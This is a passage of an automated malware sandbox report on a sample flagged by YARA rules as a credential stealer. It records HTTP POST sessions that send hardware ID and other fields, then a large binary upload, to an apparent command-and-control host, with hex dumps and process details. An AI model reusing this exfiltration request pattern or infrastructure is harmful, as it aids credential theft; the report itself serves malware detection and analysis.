                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db501605d650c0b-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1671&sent=10&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21536&delivery_rate=1773423&cwnd=251&unsent_bytes=0&cid=87d178f5ebca1153&ts=1784&x=0"
                                                                            2024-10-31 16:26:13 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 16:26:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.549709188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:14 UTC283OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 1267
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:14 UTC1267OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:15 UTC1034INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:15 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=uocabj59inc2f3ls1ed1vao7nb; expires=Mon, 24-Feb-2025 10:12:54 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DgnI60kS%2BB%2BMLkBJzt3sX2e%2BX%2F6eFYU%2FDzRW3E8heAAcuZvP6FUSZLyFpMs1B51RaM5Jz%2F%2BmV7aw7XO%2BczXuR0e4R8GfU%2B2%2B%2F6sXsaf5%2B4VeITJv%2BCdna97OwRGHLkdOHBAlE7c%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db501733925e7d3-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1081&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2186&delivery_rate=2661764&cwnd=231&unsent_bytes=0&cid=7dff8c2dfcc95386&ts=733&x=0"
                                                                            2024-10-31 16:26:15 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 16:26:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.549710188.114.97.34431532C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 16:26:16 UTC285OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 585874
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 39 41 31 38 46 37 32 34 46 37 46 43 38 44 43 37 44 38 31 34 31 34 31 41 30 41 44 33 37 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B89A18F724F7FC8DC7D814141A0AD377--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 79 e4 ef 92 bf a4 b4 78 92 a3 a2 1c 2c 08 fc 2c e2 9a 03 04 c0 1b 21 3b b5 5a 70 3d c4 e9 c0 98 c6 ed 0a d1 75 8d fa 6d e6 d6 23 09 01 79 b1 65 2c e1 5e a8 b9 5e 80 30 49 8a 54 69 f2 2e b0 b4 6c e7 7e 79 5a b9 49 90 90 de f9 ea 71 21 0b 23 55 d8 f7 e0 13 e6 bb 42 87 3e 2e 4f 9c 56 8e ae 12 04 62 95 93 cf f3 01 75 aa 01 ab 5d 7e 6a c1 a1 d7 e0 d7 d3 d5 4a d7 ff e4 50 b0 38 67 e4 f5 83 50 57 51 d6 e2 6f 6a fb 63 f8 a3 13 0c e0 8b f2 ad b6 07 e5 6d 90 9f fb 05 ec dc 98 1d cf 74 59 ff f3 07 65 ee cc 2a bf bb 95 c0 64 37 24 8f 8c de 1b 7b c0 7e a4 ab d4 29 b0 37 ff 2d b4 1d 75 79 0c d8 25 5f fe b7 a1 b3 ae 1a e1 07 1d 60 0e 87 88 4d 6a 3e 02 38 5e 89 00 49 a6 69 83 39 1a eb 9f cc 2a a0 04 48 a2 b8 3b 28 21 fb e3 e0 ad 4d ca 85 4e 3b 88 b9 4f ae 5f 18 38 3e c8
                                                                            Data Ascii: yx,,!;Zp=um#ye,^^0ITi.l~yZIq!#UB>.OVbu]~jJP8gPWQojcmtYe*d7${~)7-uy%_`Mj>8^Ii9*H;(!MN;O_8>
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 19 49 51 22 fd 13 e5 fb 65 d3 d8 40 83 b2 d7 f4 ce b2 5f f7 df 87 fb 65 c7 c5 c6 6e 68 9d 47 3e ae 9b e7 20 c2 73 5d 16 7d 9e a3 8b 3a ba 26 cb bc b0 b3 1d fd d7 1e 42 36 6d 81 d8 f6 c1 5c ea d7 a8 12 5d ec 6d 3e 65 56 d0 57 00 9c dd a6 07 b9 77 76 cc 30 9c 36 2b 07 96 2a 77 2c d8 1f e0 b5 0f 05 8f 27 2e dc 54 bc 4c af 5b 9f 5f 1c 34 d3 5b 5c d1 a1 ff d1 02 88 9d 8b 51 47 b4 82 72 32 fd 5f 98 6c 4c 3d 75 be 3a 9c a0 b2 b7 7a a6 be db 64 4f 56 d5 36 34 fc 80 41 a4 24 a1 40 bc 99 57 5b 8d f5 20 43 9e 1b ca eb a6 0f fd ef 39 95 a7 01 7d f7 6f ed f1 d0 0b 02 11 17 40 f8 d0 cd 70 0f c0 96 7d 0a c0 49 33 d0 1f 0e fa af cf f8 20 df 16 03 0a cf 89 db fc bf 87 f3 24 1d 15 b0 79 2d 8a a0 67 41 a8 b1 a2 89 21 00 f0 18 e1 66 90 d5 50 5b dd d4 58 8e 0e 60 3e a8 19 a9
                                                                            Data Ascii: IQ"e@_enhG> s]}:&B6m\]m>eVWwv06+*w,'.TL[_4[\QGr2_lL=u:zdOV64A$@W[ C9}o@p}I3 $y-gA!fP[X`>
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 61 a9 f2 1c 15 8a e0 e1 e7 b0 93 b2 4a d7 07 ed 7a 4a 68 27 60 59 95 6b 62 fc 56 75 47 cc 0c 95 bf 2a dd cb 04 ed 65 82 c5 d2 76 4c 21 07 60 a9 93 1d 5a 03 78 94 6d d4 27 56 54 10 e4 a2 3e 88 54 8c 17 47 ef d9 cd 2e 3c ca e4 3b 7c 64 bc 82 ae 30 d3 92 25 af a4 e0 1c e6 00 ae c0 32 eb 8c fc 05 1c 62 7b 8d 41 83 cb 2d 84 df 3d fa 99 ed 64 ae 53 aa 07 4f f2 53 38 ad 2b 4c 8a 03 ff c2 ca 57 ec c6 4a fd ab 03 56 cb 2a be a9 92 b6 d4 02 1c 53 aa 9f 9f 7c f0 83 73 10 1c 09 b9 24 02 78 9b 32 48 a4 21 41 1a d8 a5 5c cc 08 14 6a b2 37 76 54 f3 cd 0a b2 94 ae e9 2e 03 84 fd db 5a 51 f3 ec 85 12 c1 d7 62 40 f4 e0 d5 11 47 65 b0 d1 c3 09 e6 48 72 57 67 7d 8a 3e b0 a6 85 38 5b e8 8a 75 55 6a 59 0e 37 f2 9b 5f cf 67 f6 64 c1 7c 6b b0 59 bd f7 1f ae c1 57 6e 7c 8f 00 4d
                                                                            Data Ascii: aJzJh'`YkbVuG*evL!`Zxm'VT>TG.<;|d0%2b{A-=dSOS8+LWJV*S|s$x2H!A\j7vT.ZQb@GeHrWg}>8[uUjY7_gd|kYWn|M
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: d3 43 3c e7 ae c9 a5 9c 54 e8 e6 cb 4b 12 5e 68 6b 8c 9a e4 f7 a3 37 e4 24 13 bf e3 d0 40 4b 42 30 36 66 0f c6 8b 75 91 81 6a 8f 09 35 35 2d 87 95 1e 8c 3a a9 20 b3 be af 7d ac 5a 9f 63 ea dd ae 8f e0 e3 0e 3a e1 3b de 7f 58 66 7b fe 13 03 2f bf fb 7a ce 44 76 ac cb 9d a2 cf a7 75 45 ee 3f d4 23 38 38 d0 7a 1a 6f 1e 22 0e ef 6f d6 08 27 1c 3c 3c f3 9b 76 d4 32 27 32 91 11 5f 60 2c 30 2e 56 63 af 9b b7 70 66 34 4b 5f c0 cb 57 43 3e 9a 7f 25 bf 43 fd f8 ee 76 38 5e 60 97 d6 e5 d3 c4 cc 08 fc f3 7b ed 5d b9 cb 9c 12 c1 13 f3 3e 97 9d a3 30 c3 d0 3d 79 8c a0 14 62 bd 21 33 98 5d ac 91 fb 42 0a 8f 39 07 f2 f6 08 46 29 53 2a 2e da f5 47 21 16 12 67 6b f5 15 bd ff ef 54 fd ff ef 02 a9 90 e5 09 98 10 1c 58 ad a3 29 fa 40 0b 0e 8d c7 f4 83 b7 ad 20 95 58 87 4b 40
                                                                            Data Ascii: C<TK^hk7$@KB06fuj55-: }Zc:;Xf{/zDvuE?#88zo"o'<<v2'2_`,0.Vcpf4K_WC>%Cv8^`{]>0=yb!3]B9F)S*.G!gkTX)@ XK@
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: d9 d5 30 85 f8 8a f5 b0 13 8e 9f bd 61 ab 4f 7b 13 42 bd c8 5f 2d 04 67 92 d8 bc fa c0 27 b7 a1 19 b5 c5 c2 f5 6f a6 07 c9 96 dc e7 9c 94 d2 fe 11 c2 9b 99 42 8d bd 52 6f 68 c9 bb 1d 75 2e df 2d 7e f7 5a 17 4d a6 eb 80 ba f0 98 d9 8b b3 d4 65 be a1 7c 54 f8 59 c2 a3 3d 1e 41 a9 48 13 85 aa 6b 3e ec e4 c1 b0 b1 d8 36 fb 21 03 1e 94 db 72 64 3d e5 b9 93 87 cf 46 72 0d f1 0c f5 f9 bb b8 93 af 47 05 70 c8 06 53 86 dc 58 55 02 26 2a 00 07 dc 9a cc 65 28 da 99 b0 87 26 be d0 44 5b 02 7d 7c 86 1a 04 41 dc ab c2 2b 87 a7 c6 02 49 fd aa 73 83 a1 46 4a 3f 9b 36 4c 41 a3 85 6a 62 48 3c 12 5b b2 22 a0 af 87 5c db bc e0 9b 3c 34 9b 14 b3 d3 b7 a8 ba f2 d3 3f 28 b5 97 ea 77 8d e4 94 56 f9 a0 b9 08 b2 7e 95 52 ba 5d 70 62 1f 0a 98 59 fd fd 8e 9e 6b 06 1a 03 4a 01 9c bb
                                                                            Data Ascii: 0aO{B_-g'oBRohu.-~ZMe|TY=AHk>6!rd=FrGpSXU&*e(&D[}|A+IsFJ?6LAjbH<["\<4?(wV~R]pbYkJ
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: 5d 89 9a cc 13 88 e8 93 68 2a 08 eb 71 a1 56 33 2b 98 71 4b c7 ee 89 ea c6 dd db ff b9 e0 91 38 8d 7f 89 5f 35 56 89 c6 b3 2c bc d6 7b 05 af b9 e3 c5 d7 2a 30 3c 62 19 e1 11 bd 2a b4 e4 20 c0 d0 36 c8 eb 3e 02 de 1f 55 15 58 58 9e 5c ce aa d1 8d c1 cc 5a 0e 9b 48 23 49 ff 52 52 d6 90 d7 99 2a 11 a2 74 cb e5 64 8a 11 c0 37 13 a9 15 b6 65 3e 67 63 89 55 87 b7 7b be 53 64 77 d2 5b 86 3b df 27 6a f9 96 7a 72 e6 dd 39 3e f4 a5 c5 cf 94 75 f7 77 3f d4 17 7f 02 52 86 0f 23 49 ff 05 82 b6 3f a0 f4 4a cf 8e 18 92 66 7e d7 cb e5 16 f0 30 d2 02 4b cd 9b f6 7e 13 df 39 42 c5 e4 4c 4c 88 29 0e b0 8b 6f 65 bc e8 cc d9 4c fe 6e ab 04 65 d9 64 78 7f f7 4d 47 81 3f 65 48 4e fe 9b ab 20 a3 cd 12 07 3e 8d 70 51 0b 4f 97 25 7e f6 bd 0d 97 a8 34 ff 00 a1 12 e6 9a 7f 30 ef a6
                                                                            Data Ascii: ]h*qV3+qK8_5V,{*0<b* 6>UXX\ZH#IRR*td7e>gcU{Sdw[;'jzr9>uw?R#I?Jf~0K~9BLL)oeLnedxMG?eHN >pQO%~40
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: df fd 6e e1 4e 42 cb ba 8f 27 bb 6a ae 1f 07 df 32 f4 17 08 84 c0 ca f6 6a 15 e6 57 d9 2d bc df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65 28 c7 e0 f7 fd 81 b3 a6 a8 3a
                                                                            Data Ascii: nNB'j2jW-Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe(:
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: ea 99 a3 3f ea 1c 96 92 f2 de 89 c2 bb 7b 13 0e 6b b8 fd 1d 57 73 36 8f 5a 8c c1 68 46 6b 37 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b c3 c3 05 f3 d7 15 ee e7 3d 52
                                                                            Data Ascii: ?{kWs6ZhFk72 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy|&3k (^O^_nS\kcuB[r-I`={=R
                                                                            2024-10-31 16:26:16 UTC15331OUTData Raw: b0 43 d2 3f de d5 7f d7 43 57 f4 bf f0 13 db f3 f6 15 a2 7e 93 e2 4e 1f 73 90 75 5e 68 0b fb 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60 63 20 54 97 78 6a 58 63 d5 9a
                                                                            Data Ascii: C?CW~Nsu^hETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?| <4ra:~bhhMa`c TxjXc
                                                                            2024-10-31 16:26:18 UTC1027INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 16:26:18 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=ufo4d3l2481k3t77a3mfg4em00; expires=Mon, 24-Feb-2025 10:12:57 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L7sYWITu%2FmleklFz%2BOndeGJ2A0OAX54zkrT869wOmPYo81vNtu%2BVC%2BR0DQ9Rv5E0dCkZOaqkZj7MJyQh%2F94YT0QfKfimk6IUKW3hA%2BfIDkcVWjLpU4IHfU9eFKACoRjSbtrO8pA%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db5017e2d6de7d3-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1339&sent=232&recv=640&lost=0&retrans=0&sent_bytes=2844&recv_bytes=588467&delivery_rate=2149962&cwnd=231&unsent_bytes=0&cid=b66e236f5650fcf0&ts=1897&x=0"


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:12:26:00
                                                                            Start date:31/10/2024
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x9c0000
                                                                            File size:3'022'848 bytes
                                                                            MD5 hash:55BFAA52FB91CCAA609FDA3E4BA384F1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153485433.000000000143F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2126656306.000000000143F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157189871.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156552195.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156115915.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154213981.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154539398.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153850742.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157640041.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157558824.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157692564.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156174138.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154355396.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154850017.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156037411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154796125.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2156976484.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106766668.000000000143F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154725777.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154129411.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2154641557.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157138050.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2153793686.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2158045803.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2155243058.0000000001440000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
